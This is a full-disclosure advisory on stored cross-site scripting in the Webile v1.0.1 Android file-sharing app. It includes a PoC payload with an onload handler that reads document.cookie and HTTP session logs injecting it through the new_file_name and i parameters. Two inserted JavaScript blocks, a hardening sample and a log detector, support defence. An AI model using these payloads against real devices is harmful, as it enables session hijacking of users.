List:       full-disclosure
Subject:    [FD] Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities
From:       "info@vulnerability-lab.com" <info@vulnerability-lab.com>
Date:       2023-07-19 7:13:37
Message-ID: <3334589c-5cdf-6e84-81e5-272d5a341fe4@vulnerability-lab.com>

Document Title:
===============
Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321


Release Date:
=============
2023-07-03


Vulnerability Laboratory ID (VL-ID):
====================================
2321


Common Vulnerability Scoring System:
====================================
5.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Webile is a local area network cross-platform file management tool based on the HTTP protocol. Using the personal mobile phone as a server in the local area network, it supports browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, file statistics, displaying performance, etc. No need to connect to the Internet: you can browse files, send data, play videos and use other functions through a WiFi LAN or mobile phone hotspot, and no additional data traffic is generated during data transmission. Supports Mac, Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 WiFi mobile Android web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the Webile v1.0.1 WiFi mobile Android web application. The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent input validation web vulnerabilities are located in the send and add functions. Remote attackers are able to inject their own malicious script code into the new_file_name and i parameters of the POST method request to provoke a persistent execution of the malformed content.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to a malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i
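The root cause described above is that a stored message or file name is written into the page markup verbatim. The following is an added example, not code from Webile or the vendor, that places the unsafe concatenation pattern beside an output-encoded version and adds a server-side allow-list for new_file_name. The function names, the file-name policy and the numeric-id check are assumptions of this example; the sample payload is the one from the advisory's PoC.

```javascript
// Added example (not Webile's code): output encoding and input allow-listing
// for the two injection points named in the advisory. All names are ours.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored message is dropped into the markup verbatim,
// so a message containing a tag becomes part of the page every time it renders.
function renderMessageVulnerable(id, text) {
  return `<span id="c_${id}">${text}</span>`;
}

// Hardened pattern: same template, but the user-controlled text is encoded and
// the id is forced to a non-negative integer so it cannot escape the attribute.
function renderMessageSafe(id, text) {
  const safeId = Number.parseInt(id, 10);
  if (!Number.isInteger(safeId) || safeId < 0) throw new RangeError('bad message id');
  return `<span id="c_${safeId}">${escapeHtml(text)}</span>`;
}

// Server-side allow-list for the "create" action's new_file_name: one path
// component of printable characters, with no separators, HTML metacharacters
// or traversal. This policy is an assumption of the example, not the vendor's.
const FILE_NAME_RE = /^[A-Za-z0-9._ \-()]{1,255}$/;
function isAcceptableFileName(name) {
  return typeof name === 'string'
    && FILE_NAME_RE.test(name)
    && name !== '.' && name !== '..';
}

// Payload copied from the advisory's PoC, used here as sample input.
const SAMPLE_PAYLOAD = 'test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg>';

// Side-by-side comparison for a reader running this stand-alone.
console.log('vulnerable:', renderMessageVulnerable(3, SAMPLE_PAYLOAD));
console.log('safe:      ', renderMessageSafe(3, SAMPLE_PAYLOAD));
console.log('file name accepted:', isAcceptableFileName('pwnd23>"<iimg src=evil.source>'));
```

In the browser the same effect is obtained by assigning the message with `element.textContent` rather than `innerHTML`; a Content-Security-Policy without `'unsafe-inline'` would additionally refuse the inline onload handler even if encoding were missed.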


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability, follow the provided information and steps below.


Vulnerable Source: Send
Send message to phone listing
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div> </div></div></div>
History logs messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
<th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead>
<tbody><tr>
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"> <input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div> </td>
<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
<td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>



--- PoC Session Logs #1 (POST) ---  (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie:
treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6



--- PoC Session Logs #2 (POST) ---  (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0
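Both session logs above show the same shape: a POST to /file_action or /send whose form field i carries a JSON object, with the markup sitting inside one of its string values. The following is an added example, not code from Webile, the vendor or Vulnerability-Lab, of a small detector for that pattern: it decodes the i field, tries to parse it, and reports any string field containing a tag or an event-handler attribute, treating unparseable JSON that still carries markup (as in PoC #1, where the payload breaks out of the quoted value) as a finding too. The log line format, the helper names and the benign sample lines are assumptions of this example; the two malicious bodies reuse the advisory's own PoC payloads.

```javascript
// Added example (not Webile's or the vendor's code): flag the request pattern
// from the PoC session logs. Neither a file name nor a chat message should
// ever carry HTML markup, so markup in any string field of `i` is a
// high-signal finding. Log format and helper names are our assumptions.

// Endpoints named in the advisory.
const WATCHED_PATHS = new Set(['/file_action', '/send']);

// An HTML tag (no whitespace allowed after '<', which matches how browsers
// tokenize) or an inline event-handler attribute such as onload=.
const MARKUP_RE = /<\/?[a-z][^>]*>|\bon[a-z]+\s*=/i;

// Return the decoded value of the `i` field from a urlencoded body, or null.
function extractParamI(body) {
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');
    if (eq !== -1 && pair.slice(0, eq) === 'i') {
      return decodeURIComponent(pair.slice(eq + 1).replace(/\+/g, ' '));
    }
  }
  return null;
}

// Inspect one request; null when clean, otherwise { path, reason }.
function inspectRequest(method, path, body) {
  if (method !== 'POST' || !WATCHED_PATHS.has(path)) return null;
  const value = extractParamI(body);
  if (value === null) return null;
  let fields;
  try {
    fields = JSON.parse(value);
  } catch (err) {
    // A quote-breaking payload (PoC #1) leaves the JSON unparseable; report
    // it only if the raw value also carries markup, to avoid noise from bugs.
    return MARKUP_RE.test(value) ? { path, reason: 'markup in malformed JSON' } : null;
  }
  if (fields && typeof fields === 'object') {
    for (const [key, val] of Object.entries(fields)) {
      if (typeof val === 'string' && MARKUP_RE.test(val)) {
        return { path, reason: `markup in field ${key}` };
      }
    }
  }
  return null;
}

// Log line format assumed here: "<METHOD> <PATH> <urlencoded body>".
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const [method, path, body = ''] = line.split(' ');
    const hit = inspectRequest(method, path, body);
    if (hit) findings.push(hit);
  }
  return findings;
}

// Constructed sample log. The two malicious bodies reuse the advisory's PoC
// payloads; the benign ones are made up for contrast (note the "<" in the
// benign chat message, which is not a tag and must not fire).
const SAMPLE_LOG = [
  'POST /file_action i=' + encodeURIComponent(JSON.stringify(
    { action: 'create', file_path: '/storage/emulated/0', new_file_name: 'notes.txt' })),
  'POST /file_action i=' + encodeURIComponent(
    '{"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}'),
  'POST /send i=' + encodeURIComponent(JSON.stringify(
    { os: 'Windows Windows 10', b: 'firefox 102.0', c: 'meet at 8, a < b and c > d' })),
  'POST /send i=' + encodeURIComponent(JSON.stringify(
    { os: 'Windows Windows 10', b: 'firefox 102.0', c: '>"<iimg src=evil.source onload=alert(document.cookie)></iimg>' })),
  'GET /webile_files',
];

console.log(scanLog(SAMPLE_LOG));
```

The check is deliberately narrow (two endpoints, one parameter) so it can run on a reverse proxy or in a log pipeline without a full HTML parser; the malformed-JSON branch matters because the first PoC body is not valid JSON at all, and a detector that only inspects parsed fields would miss it.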


Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/